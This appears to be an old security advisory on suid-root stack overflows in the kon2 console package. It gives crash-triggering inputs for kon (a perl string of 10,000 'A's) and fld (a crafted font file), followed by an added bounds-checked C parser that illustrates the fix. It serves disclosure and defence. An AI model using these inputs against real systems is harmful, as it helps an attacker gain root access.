COMMAND

    "kon2" package

SYSTEMS AFFECTED

    kon2-0.3.9

PROBLEM

    Chris Evans found the following in the "kon2" package, a program for
    displaying Japanese on the console.  In the version Chris briefly
    examined, there were three suid-root executables:

        - kon
        - fld
        - newvc

    Here are details of breakages in "kon" and "fld".  Both lead to root
    compromise, although it wasn't verified whether the program had
    dropped root privileges or not at the time of the overflows.

    No discussion of code flaws today, because boring stack overflows
    are being used.

    1) kon
    ======
    kon VGA -StartupMessage `perl -e 'print "A"x10000'`

        => segfault with EIP 0x41414141

    2) fld
    ======
    a) Create file "read.me.and.die", contents:

        CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA"
        CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
        CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"

        ...

    BUT substitute each sequence of A's with 200 A's.

    b) fld -t bdf read.me.and.die
    You don't get a clean 0x41414141 stack trace, but that's just a
    minor detail, and these things are always circumventable (a
    pointer gets toasted in between two char[] buffers on the stack).
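    As an added illustration (not code from kon2 or from this advisory), a
    bounds-checked parser for one KEYWORD"value" line of the kind fld reads:
    the buffer sizes, the struct and the function names are assumptions, but
    the length check before the copy is exactly the one whose absence lets a
    200-byte CHARSET_REGISTRY value run past a fixed char[] on the stack.

```c
#include <string.h>

#define KEY_MAX 32  /* fixed buffer sizes, assumed for illustration only */
#define VAL_MAX 64

typedef struct {
    char key[KEY_MAX];
    char val[VAL_MAX];
} bdf_kv;

/* Parse one KEYWORD"value" line (the shape used in read.me.and.die; the
 * space real BDF puts before the quote is tolerated). Returns 0 on success,
 * -1 for a malformed line and -2 when the keyword or value would not fit
 * its buffer: over-long input is refused instead of copied past the end. */
int parse_bdf_kv(const char *line, bdf_kv *out)
{
    const char *q = strchr(line, '"');
    if (q == NULL || q == line)
        return -1;
    size_t klen = (size_t)(q - line);
    if (line[klen - 1] == ' ')  /* optional separator before the quote */
        klen--;
    const char *vstart = q + 1;
    const char *vend = strchr(vstart, '"');
    if (vend == NULL)
        return -1;
    size_t vlen = (size_t)(vend - vstart);
    if (klen == 0 || klen >= KEY_MAX || vlen >= VAL_MAX)
        return -2;  /* the check whose absence lets 200 A's smash the stack */
    memcpy(out->key, line, klen);
    out->key[klen] = '\0';
    memcpy(out->val, vstart, vlen);
    out->val[vlen] = '\0';
    return 0;
}

/* Constructed input: a CHARSET_REGISTRY line whose value is n 'A's, like the
 * advisory's file but with n chosen by the caller (n <= 1000). */
int parse_with_value_len(size_t n)
{
    char line[1024];
    bdf_kv kv;
    if (n > 1000)
        return -1;
    memcpy(line, "CHARSET_REGISTRY\"", 17);
    memset(line + 17, 'A', n);
    line[17 + n] = '"';
    line[18 + n] = '\0';
    return parse_bdf_kv(line, &kv);
}
```

    With the 200-A value from the advisory the parser returns -2 and the
    stack buffers are never written, which is the behaviour a fixed fld
    would need before anything else.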

SOLUTION

    Nothing yet.